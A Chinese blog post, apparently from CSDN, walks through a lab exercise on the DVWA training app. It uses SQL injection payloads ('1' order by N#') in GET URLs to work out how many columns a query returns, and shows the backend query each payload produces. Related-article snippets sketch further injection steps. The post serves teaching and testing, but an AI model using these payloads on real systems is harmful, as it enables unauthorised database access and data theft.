SQL注入--猜解数据表列数

已于 2024-04-28 23:11:39 修改
阅读量148 收藏 1
点赞数 6
分类专栏: SQL注入 文章标签: 数据库 web安全 mysql
于 2024-04-28 23:08:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YYYYU_ZHIZZZ/article/details/138294447
版权
文章详细描述了在DVWA环境中利用GET方法进行字符型SQL注入攻击的过程,通过观察不同orderby参数变化,推测用户表结构。攻击者利用`orderby`变量构造恶意SQL查询,获取users表的敏感信息。
摘要由CSDN通过智能技术生成

DVWA源码

由源码可知是字符型注入

此题使用GET方法传参,可直接在url编辑参数

127.0.0.1:82/vulnerabilities/sqli/?id=1' order by 1#&Submit=Submit#

php执行

$query  = "SELECT first_name, last_name FROM users WHERE user_id = '1' order by 1#;";

后端数据库执行

127.0.0.1:82/vulnerabilities/sqli/?id=1' order by 2#&Submit=Submit#

php执行

$query  = "SELECT first_name, last_name FROM users WHERE user_id = '1' order by 2#;";

后端数据库执行

127.0.0.1:82/vulnerabilities/sqli/?id=1' order by 3#&Submit=Submit#

php执行

$query  = "SELECT first_name, last_name FROM users WHERE user_id = '1' order by 3#;";

后端数据库执行

由以上猜解知,数据表只有2列。

YYYYU_ZHIZZZ
关注
  • 6
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
sql注入之order by猜列数问题
weixin_33857679的博客
04-07 3510
环境: xampp-win32-5.6.3-0-VC11 dvwa-1.0.8 前言 有幸在网上搜到一款非常不错的渗透测试演练系统 — dvwa ,作为学习,演练真的非常强大啊! 在学习的过程中也遇到一些问题,所以这里做学习分享记录。 问题简述 在用dvwa做sql 注入检测时,遇到一个小小的问题 — order by 猜出来...
SQl注入学习
weixin_42451330的博客
06-08 937
如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,成为宽字节,像GB2312、GBK、GB18030、BIG5、Shift_JIS等这些编码都是常说的宽字节。
sql注入猜测字段数的基本方法
bcbobo21cn的专栏
02-16 522
sql order by 可以根据列名,或数字指定第几个字段排序;
SQL注入--表的猜解
写下些记录
02-08 5096
步骤 表名—>列名—>列长度—>具体值 例如:注入点 http://www.XX.com/index.asp?id=1 猜解表名:http://www.XX.com/index.asp?id=1 and exists select * from 猜测的表名 猜解列名:http://www.XX.com/index.asp?id=1 and exists selec...
SQL注入——猜测字段名称
weixin_30337251的博客
07-13 358
之前两篇文章所说的SQL注入手段均是在服务器层面是root权限,而现实的渗透测试过程中,很多都是无权读取information_schema库,并且很多拒绝联合访问Union和order by语句。遇到这些问题时候,就需要我们去爆破猜测一些数据库字开发逻辑,对一些列,表,内容进行猜测 猜测某个列 猜测abc这个列是否存在,网页提示: 说明我们所...
go-sql-driver.zip
11-26
4. **预编译语句**:使用`Prepare()`预编译SQL语句,提高执行效率并防止SQL注入。 5. **日志记录**:在生产环境中,启用日志记录可以帮助追踪和调试数据库操作。 ### 总结 `go-sql-driver`是Go语言与MySQL数据库...
mysql注入-sqlilabs靶场注入
10-15
例如,使用UNION查询在已知列数的场景下合并结果,使用注释符号来隐藏部分SQL代码,或者利用ORDER BY和LIMIT来枚举列数和行数。此外,还有二进制注入,通过ASCII值转换来插入特殊字符,以及使用存储过程和函数来执行...
sql注入讲解ppt.pptx
08-10
SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库...
易语言SQL注入源码-易语言
06-13
在给定的“易语言SQL注入源码”中,我们可以深入探讨关于SQL注入和易语言编程的相关知识点。 1. SQL注入攻击: SQL注入是一种常见的网络安全漏洞,它发生在应用程序没有充分验证用户输入的情况下。攻击者可以通过...
sqli-labs实验指导手册
11-17
SQL注入是一种常见的网络安全漏洞,它允许攻击者通过在Web应用程序的输入字段中插入恶意SQL代码来操纵数据库。sqli-labs是一个专门设计的实验平台,用于教育和实践SQL注入技术。以下是对sqli-labs实验指导手册中涉及...
简单SQL注入
qq_38680693的博客
07-20 1225
本文主要介绍两种SQL注入漏洞: 一、ASP+ACCESS注入 二、PHP+MYSQL 一、ASP+ACCESS注入 SQL注入思路:找注入点  ->  判断是否为注入点  ->  猜表名  ->  猜字段名  ->  爆出字段内容 1、找注入点 那么何为注入点?有参数进行数据库传递的都可判为注入点。以此URL为例: xxx.xxx.xx.xx/show.a...
sql注入,手动猜表名字段名
pigHead_chen的专栏
11-14 1万+
方法从网上看来的,记下来以后看。 1,猜表名: abc.asp?id=12 and 0 错误结果显示米有User表。   abc.asp?id=12 and 0 加载。。。,说明存在表Admin。   2,猜字段名: abc.asp?id=12 and 0 加载。。。,说明表Admin有字段id。 abc.asp?id=12 and 0 abc.asp?id
SQL注入试验一(获取数据库内容)
热门推荐
Toby的博客
10-10 1万+
这篇博客是讲述SQL注入的实例操作,废话不多说,下面开始:      第一步我们要先判断是否存在注入点      进入实验的网站,如下:       然后在网址后面输入单引号'   回车(如下图,出现错误)       接下里在网址后面输入 and 1='1(此处需要注意闭合单引号,网页恢复正常)       然后将 and 1=‘1 改成 and 1=‘
sql注入获取mysql信息_Burpsuite练兵场-利用SQL注入获取数据库内容数据(二)
weixin_32028323的博客
02-11 478
实验一:Oracle数据库版本查询实验要求:通过SQL注入显示后台数据库Oracle版本信息探查查询列数量探查查询列类型(注意Oracle数据库执行查询时必须附加表名,因此from dual不可遗漏,Oracle保证数据库中存在dual表以便于构成查询语句)注入显示版本号,完成实验实验二:MySQL和Microsoft数据库版本查询实验要求:通过SQL注入显示后台数据库版本信息探查查询列数量(后面...
DVWA1.9 SQL注入全等级手工注入流程
Wh0ami
12-21 2446
最近想复习一下手工sql注入,下面我将通过DVWA1.9进行一遍手工注入过程。 low 自动化的注入神器sqlmap固然好用,但还是要掌握一些手工注入的思路,下面简要介绍手工注入(非盲注)的步骤。 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定显示的字段顺序 4.获取当前数据库 5.获取数据库中的表 6.获取...
sql 注入及爆表与字段
Vi的专栏
05-22 8252
http://www.cchacker.com/main 转载请保留来源与版权信息,尊重作者劳动。 一、SQL 脚本注入攻击前奏 注入点的寻找、区分、与判断 手工寻找检测注入点 http://www.target.com/article.asp?id=1ASP 注入 http://www.target.com/article.php?id=1 PHP 注入
JavaFx+MySql学生管理系统
2301_81253185的博客
07-11 1105
上个月学习了javafx和mysql数据库,于是写了一个学生管理系统,因为上个月在复习并且有一些事情,比较忙,所以没有更新博客了,这个项目页面虽然看着有点简陋了,但是大致内容还是比较简单的,于是现在跟大家分享一下我的学生管理系统,希望对这方面有兴趣的同学提供一些帮助。
set user & password for database 设置数据库 用户和密码
最新发布
DavidsonGong的博客
07-12 151
USE sbms;
7.10飞书一面面经
东篱君的博客
07-10 1207
B+树的⾮叶⼦节点不存放实际的记录数据,仅存放索引,所以数据量相同的情况下,相⽐存储即存索引⼜存记录的 B 树,B+树的⾮叶⼦节点可以存放更多的索引,因此 B+ 树可以⽐ B 树更「矮胖」,查询底层节点的磁盘 I/O次数会更少。主从复制:单节点Redis的并发能力是有上限的,要进一步提高Redis的并发能力,可以搭建主从集群,实现读写分离。B+ 树有⼤量的冗余节点(所有⾮叶⼦节点都是冗余索引),这些冗余索引让 B+ 树在插⼊、删除的效率都更⾼,⽐如删除根节点的时候,不会像 B 树那样会发⽣复杂的树的变化;

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值